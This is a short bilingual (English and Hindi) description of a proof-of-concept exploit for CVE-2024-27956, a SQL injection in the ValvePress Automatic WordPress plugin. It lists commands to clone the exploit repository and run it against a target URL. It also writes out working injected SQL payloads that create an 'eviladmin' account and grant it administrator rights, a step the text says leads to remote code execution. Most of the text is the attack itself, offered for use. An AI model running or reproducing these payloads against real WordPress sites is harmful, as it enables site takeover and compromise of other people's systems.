
Proof-of-concept exploit for CVE-2024-27956, a SQL injection in ValvePress Automatic WordPress plugin. Creates admin user and enables remote code execution via unsanitized input.
CVE-2024-27956 के लिए एक PoC, ValvePress Automatic प्लगइन में SQL इंजेक्शन। यह PoC कमजोरी का शोषण करके लक्ष्य में एक उपयोगकर्ता बनाता है और उसे प्रशासक अधिकार देता है। WordPress में प्रशासक होने से Remote Code Execution प्राप्त किया जा सकता है।
git clone https://github.com/diego-tella/CVE-2024-27956-RCE/
cd CVE-2024-27956-RCE
python exploit.py http://target.com
q=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_status, display_name) VALUES ('eviladmin', '$P$BASbMqW0nlZRux/2IhCw7AdvoNI4VT0', 'eviladmin', '[email protected]', 'http://127.0.0.1:8000', '2024-04-30 16:26:43', 0, 'eviladmin')
प्रशासक अधिकार प्रदान करना:
q=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES ((SELECT ID FROM wp_users WHERE user_login = 'eviladmin'), 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}
q पैरामीटर में, हम अपना पूरा क्वेरी पास कर सकते हैं और फिर इसे निष्पादित किया जाएगा।
उपयोगकर्ता इनपुट को बिना किसी प्रतिबंध या सैनिटाइज़ेशन के सीधे निष्पादित किया जाता है।